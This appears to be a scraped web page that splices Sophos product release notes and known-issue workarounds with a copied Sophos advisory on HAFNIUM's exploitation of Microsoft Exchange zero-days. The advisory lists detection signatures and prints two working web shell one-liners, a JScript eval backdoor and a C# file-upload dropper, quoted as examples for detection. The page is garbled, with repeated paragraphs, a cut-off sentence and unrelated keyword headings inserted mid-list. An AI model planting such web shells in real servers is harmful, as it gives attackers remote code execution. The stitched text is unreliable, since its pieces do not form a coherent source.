Sophos Antivirus Server

Posted on  by admin

Restart the computer or server. Turn off tamper protection on the computer or server. Note: Unlock the server before uninstalling Sophos. Go to the Servers' list, then under the Lockdown status column, click Unlock for the target server. Restart the computer or server. Turn off tamper protection on the computer or server. Note: Unlock the server before uninstalling Sophos. Go to the Servers' list, then under the Lockdown status column, click Unlock for the target server. Sophos Anti-Virus has been updated to support changes in the Windows Server 1709 release. Sophos Device Control has been updated to support the latest devices from.

Known issues and limitations

Known issues and limitations, listed by ID, affected component and a description of the issue.
Issue IDComponentDescription
WINEP-1577Sophos Central agent installerThe logged on user who runs SophosInstall.exe must be a member of the SophosAdministrator group in order to migrate an on-premise–managed computer to Sophos Central. Otherwise, the installation will fail.

If you have experienced this issue, add the user account to the SophosAdministrator group and re-run the installer.

WINEP-1423Sophos Central agent installerWhen migrating an on-premise–managed computer to Sophos Central, a Sophos endpoint software update may cause the installation to fail. This happens when a computer is migrated without using the Sophos Central Migration Tool, by running the Sophos Central agent installer (SophosInstall.exe) on the computer either interactively or in a quiet mode. The update frequency is configured in Sophos Enterprise Console (Updating Policy > Schedule tab > Check for updates every n minutes) by the Sophos Enterprise Console administrator.

To avoid or work around this issue, you can do either of the following:

  • Stop the Sophos AutoUpdate Service before running the Sophos Central agent installer.
    1. Check the updating status by right-clicking the Sophos shield in the notification area in the taskbar and ensuring that View updating status is grayed out and cannot be selected. If an update is currently in progress, wait for it to complete before continuing.
    2. Open Windows services: depending on your operating system, click Start > Run and type “services.msc”, or click Start, type “services.msc” in the Start menu search box, and then press Enter.
    3. Right-click on the Sophos AutoUpdate Service and select Stop.
  • Increase the update interval in the updating policy in Sophos Enterprise Console to 60 minutes before starting the migration.
  • If you have experienced this error, re-run the installer at a later time when no update is in progress.

Four new zero-day vulnerabilities affecting Microsoft Exchange are being actively exploited in the wild by HAFNIUM, a threat actor believed to be a nation state.

Anyone running on-premises Exchange Servers should patch them without delay, and search their networks for indicators of attack.

Sophos protections against HAFNIUM

Sophos MTR, network and endpoint security customers benefit from multiple protections against the exploitation of the new vulnerabilities.

Sophos MTR

The Sophos MTR team has been monitoring our customer environments for behaviors associated with these vulnerabilities since their announcement. If we identify any malicious activity related to these vulnerabilities, we will create a case and be in touch with you directly.

Sophos Firewall

IPS signatures for customers running SFOS and XFOS:

CVESID
CVE-2021-2685557241, 57242, 57243, 57244, 2305106, 2305107
CVE-2021-2685757233, 57234
CVE-2021-2685857245, 57246
CVE-2021-2706557245, 57246

These signatures are also present on the Endpoint IPS in Intercept X Advanced.

IPS signatures for customers running Sophos UTM:

CVESID
CVE-2021-2685557241, 57242, 57243, 57244
CVE-2021-2685757233, 57234
CVE-2021-2685857245, 57246
CVE-2021-2706557245, 57246

If you see these detection names on your networks you should investigate further and remediate.

Sophos Intercept X Advanced and Sophos Antivirus (SAV)

Free

Customers can monitor the following AV signatures to identify potential HAFNIUM attacks:

Web shell related

  • Troj/WebShel-L
  • Troj/WebShel-M
  • Troj/WebShel-N
  • Troj/ASPDoor-T
  • Troj/ASPDoor-U
  • Troj/ASPDoor-V
  • Troj/AspScChk-A
  • Troj/Bckdr-RXD
  • Troj/WebShel-O
  • Troj/WebShel-P

Other payloads

Sophos antivirus server 2016

Sophos Antivirus Server Download

  • Mal/Chopper-A
  • Mal/Chopper-B
  • ATK/Pivot-B
  • AMSI/PowerCat-A (Powercat)
  • AMSI/PSRev-A (Invoke-PowerShellTcpOneLine reverse shell)

Due to the dynamic nature of the web shells, the shells are blocked but need to be removed manually. If you see these detection names on your networks you should investigate further and remediate.

We have also blocked relevant C2 IP destinations, where it was safe to do so.

In addition, the “lsass dump” stages of the attack are blocked by the credential protection (CredGuard) included in all Intercept X Advanced subscriptions.

Sophos EDR

Sophos

Sophos EDR customers can leverage pre-prepared queries to identify potential web shells for investigation:

When reviewing the potential web shells identified by the queries, the web shell will typically appear inside an Exchange Offline Address Book (OAB) configuration file, in the ExternalUrl field. E.g.

ExternalUrl : http://f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“key-here”],”unsafe”);}</script>

ExternalUrl: http://g/<script Language=”c#” runat=”server”>void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(“error.aspx”));}}</script>

Identifying signs of compromise

The Sophos MTR team has published a step-by-step guide on how to search your network for signs of compromise.

DearCry ransomware

The actors behind DearCry ransomware are using the same vulnerabilities as the Hafnium group in their attacks. Sophos Intercept X detects and blocks Dearcry via:

  • Troj/Ransom-GFE
  • CryptoGuard

Editor note: Post updated with addition of IPS signatures for Sophos UTM and additional detections. 2021-03-10 08:35 UTC

Editor note: Post updated with additional anti-malware signatures for Intercept X and Sophos Antvirus (SAV) 2021-03-11 14:30 UTC

Editor note: Post updated to advise that signatures are now present on the Endpoint IPS, and the addition of two further AV signatures 2021-03-12 09:10 UTC

Free Antivirus Sophos Windows

Editor note: Post updated with DearCry ransomware detections 2021-03-12 16:30 UTC